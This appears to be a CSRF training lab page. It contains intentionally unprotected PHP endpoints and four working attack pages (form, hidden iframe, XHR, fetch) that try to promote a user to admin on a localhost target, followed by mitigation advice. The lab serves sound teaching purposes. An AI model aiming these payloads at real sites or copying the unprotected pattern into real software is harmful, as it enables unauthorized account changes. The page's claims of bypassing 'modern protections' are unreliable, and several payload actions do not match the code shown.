Lab 5: Advanced CSRF Techniques

Difficulty: High

Lab Overview

This lab demonstrates advanced CSRF techniques used to bypass modern protections and security controls. These techniques include iframe-based attacks, XMLHttpRequest attacks, fetch API attacks, and other sophisticated bypass methods.

Objective: Use advanced CSRF techniques to bypass modern security protections and perform unauthorized actions.

Vulnerable Code

// Vulnerable: No CSRF protection on advanced endpoints
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['advanced_csrf'])) {
    $action = $_POST['action'] ?? '';
    $data = $_POST['data'] ?? '';
    
    // Process action without CSRF validation
    if ($action === 'update_profile') {
        $profile_data = json_decode($data, true);
        $_SESSION['user_profile'] = array_merge($user_profile, $profile_data);
    }
}

// Vulnerable: Iframe-based CSRF
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['iframe_csrf'])) {
    $action = $_POST['action'] ?? '';
    $data = $_POST['data'] ?? '';
    // Process iframe-based attack without validation
}

// Vulnerable: XHR-based CSRF
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['xhr_csrf'])) {
    $action = $_POST['action'] ?? '';
    $data = $_POST['data'] ?? '';
    // Process XHR-based attack without validation
}

Attack Status

Current Profile

Username: victim_user

Email: victim@example.com

Role: user

Balance: $1,000.00

Attack Log (0)

No attacks detected yet.

Advanced CSRF Attack

Iframe CSRF Attack

XHR CSRF Attack

Fetch CSRF Attack

Vulnerability Details

Type: Advanced CSRF Techniques
Severity: Critical
Method: POST
Issue: No CSRF protection on advanced endpoints

Advanced Attack Examples

advanced_csrf.html - Basic advanced CSRF
iframe_csrf.html - Iframe-based attack
xhr_csrf.html - XMLHttpRequest attack
fetch_csrf.html - Fetch API attack

Advanced CSRF Attack Payloads

Create these malicious HTML files to test advanced CSRF attacks:

1. Advanced CSRF Attack (advanced_csrf.html):

<html>
<body>
    <h1>Advanced CSRF Attack</h1>
    <form action="http://localhost/test/csrf/5.php" method="POST">
        <input type="hidden" name="advanced_csrf" value="1">
        <input type="hidden" name="action" value="admin_promote">
        <input type="hidden" name="data" value='{"target": "victim", "role": "admin"}'>
        <input type="submit" value="Execute Attack">
    </form>
</body>
</html>

2. Iframe-based CSRF Attack (iframe_csrf.html):

<html>
<body>
    <h1>Iframe-based CSRF Attack</h1>
    <iframe src="about:blank" id="hiddenFrame" style="display:none"></iframe>
    <script>
        var iframe = document.getElementById('hiddenFrame');
        iframe.onload = function() {
            var form = iframe.contentDocument.createElement('form');
            form.method = 'POST';
            form.action = 'http://localhost/test/csrf/5.php';
            
            var inputs = [
                {name: 'iframe_csrf', value: '1'},
                {name: 'action', value: 'profile_update'},
                {name: 'data', value: '{"username": "hacked_user"}'}
            ];
            
            inputs.forEach(function(input) {
                var inputElement = iframe.contentDocument.createElement('input');
                inputElement.type = 'hidden';
                inputElement.name = input.name;
                inputElement.value = input.value;
                form.appendChild(inputElement);
            });
            
            iframe.contentDocument.body.appendChild(form);
            form.submit();
        };
        
        iframe.src = 'about:blank';
    </script>
</body>
</html>

3. XMLHttpRequest CSRF Attack (xhr_csrf.html):

<html>
<body>
    <h1>XHR CSRF Attack</h1>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open('POST', 'http://localhost/test/csrf/5.php', true);
        xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        
        var data = 'xhr_csrf=1&action=api_call&data=' + encodeURIComponent('{"endpoint": "/api/admin", "method": "POST"}');
        
        xhr.onreadystatechange = function() {
            if (xhr.readyState === 4 && xhr.status === 200) {
                console.log('XHR CSRF attack completed');
            }
        };
        
        xhr.send(data);
    </script>
</body>
</html>

4. Fetch API CSRF Attack (fetch_csrf.html):

<html>
<body>
    <h1>Fetch CSRF Attack</h1>
    <script>
        fetch('http://localhost/test/csrf/5.php', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            body: 'fetch_csrf=1&action=modern_api&data=' + encodeURIComponent('{"query": "mutation { updateUser(id: 1, role: \'admin\') }"}')
        })
        .then(response => response.text())
        .then(data => {
            console.log('Fetch CSRF attack completed');
        });
    </script>
</body>
</html>

Real-World Attack Scenarios

Bypass modern CSRF protections and security controls
Exploit iframe-based attacks and cross-origin requests
Use XMLHttpRequest and Fetch API for advanced attacks
Perform privilege escalation and administrative actions
Bypass client-side validation and security mechanisms
Compliance violations and security breaches

Mitigation Strategies

Implement comprehensive CSRF protection for all endpoints
Use SameSite cookie attributes and proper CORS policies
Implement request origin validation and referer checking
Use proper API authentication and authorization
Implement rate limiting and request validation
Regular security testing and vulnerability assessments
Monitor for unusual request patterns and attack attempts